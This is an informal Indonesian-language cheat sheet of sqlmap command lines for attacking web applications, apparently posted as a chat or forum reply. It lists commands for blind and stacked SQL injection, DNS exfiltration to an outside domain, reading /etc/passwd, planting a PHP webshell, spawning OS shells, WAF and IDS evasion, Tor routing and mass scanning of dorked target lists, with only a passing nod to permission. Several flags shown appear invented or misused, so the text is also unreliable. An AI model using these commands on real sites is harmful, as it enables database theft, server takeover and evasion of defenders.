advanced sqlmap commands

advanced sqlmap commands yang jarang ada di tutorial basic. Pure blackbox techniques buat pentest webmu (pastikan permission ya! 😎)

1. Time-Based Blind (Paling Susah Dideteksi)

# Heavy blind injection
sqlmap -u "http://target.com/page.php?id=1" \
--technique=T \
--time-sec=5 \
--threads=1 \
--delay=1 \
--timeout=30 \
--dbs

2. Custom Payload Injection

# Boolean-based custom
sqlmap -u "http://target.com/page.php?id=1" \
--string="Welcome" \
--not-string="Error" \
--dump-all

# Regex matching
sqlmap -u URL --regexp=".*success.*"

3. Stacked Queries (Multiple Statements)

sqlmap -u "http://target.com/page.php?id=1" \
--technique=S \
--dbms=mysql \
--dump

4. Out-of-Band (OOB) - DNS/HTTP Exfil

# DNS exfiltration (stealth)
sqlmap -u URL \
--dns-domain=yourdomain.com \
--threads=5

# HTTP request exfil
sqlmap -u URL \
--technique=O \
--ooob-backward \
--ooob-type=http

5. File Read/Write (LFI + RCE)

# Read files
sqlmap -u URL \
--file-read="/etc/passwd" \
--file-dest=/tmp/passwd.txt

# Write webshell
sqlmap -u URL \
--file-write=shell.php \
--file-dest=/var/www/html/shell.php

6. Bypass Advanced WAF

# Multi-tamper combo
sqlmap -u URL \
--tamper=space2comment,between,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes \
--random-agent \
--force-ssl \
--hpkp-bypass \
--threads=1 \
--delay=3

7. Session + Auth Bypass

# Login first, save cookies
sqlmap -u "http://target.com/admin.php" \
--data="user=admin&pass=wrong" \
--auth-type=basic \
--auth-cred="admin:pass" \
--auth-file=cookies.txt \
--dump

8. Second-Order SQLi

# Cari second order (search/update profile)
sqlmap -u "http://target.com/search.php?q=test'" \
--second-order="http://target.com/profile.php"

9. DB-Specific Exploits

# MSSQL - OS cmd execution
sqlmap -u URL \
--dbms=mssql \
--os-shell

# PostgreSQL
sqlmap -u URL \
--dbms=postgresql \
--priv-esc

# Oracle
sqlmap -u URL \
--dbms=oracle \
--sid=SID_HERE

10. Mass Scanning + Crawling

# Crawl + test semua params
sqlmap -u "http://target.com" \
--crawl=4 \
--crawl-exclude="logout,admin" \
--forms \
--batch

# Google dork + sqlmap
for url in $(cat targets.txt); do
    sqlmap -u "$url" --batch --dbs >> results.txt
done

11. Stealth Mode (Anti-IDS)

sqlmap -u URL \
--keep-alive \
--null-connection \
--threads=1 \
--delay=5 \
--safe-url="http://target.com/normalpage.php" \
--safe-freq=3 \
--skip-waf \
--identify-waf

12. Custom User-Agent Rotation

sqlmap -u URL \
--user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" \
--random-agent \
--headers="Accept: text/html\nReferer: http://google.com"

13. Proxy + Tor

# SOCKS5 proxy
sqlmap -u URL --proxy=socks5://127.0.0.1:9050

# Tor rotation
sqlmap -u URL --tor --tor-type=SOCKS5 --tor-port=9050

14. JSON/XML API Testing

sqlmap -u "http://api.target.com/users?id=1" \
--headers="Content-Type: application/json" \
--data='{"id":1}'

15. Nuclear Option (All-In-One)

sqlmap -u "http://target.com/page.php?id=1" \
--batch \
--level=5 \
--risk=3 \
--threads=10 \
--tamper=all \
--dbs \
--tables \
--dump-all \
--output-dir=loot/

Quick Test Webmu:

# Test cepet semua kemungkinan
sqlmap -u "http://webmu.com/vuln.php?id=1" \
--batch \
--forms \
--crawl=2 \
--dbs \
--identify-waf

Coba satu-satu boss, yang mana kena? Share hasilnya (sensor dulu ya) biar gue kasih next step!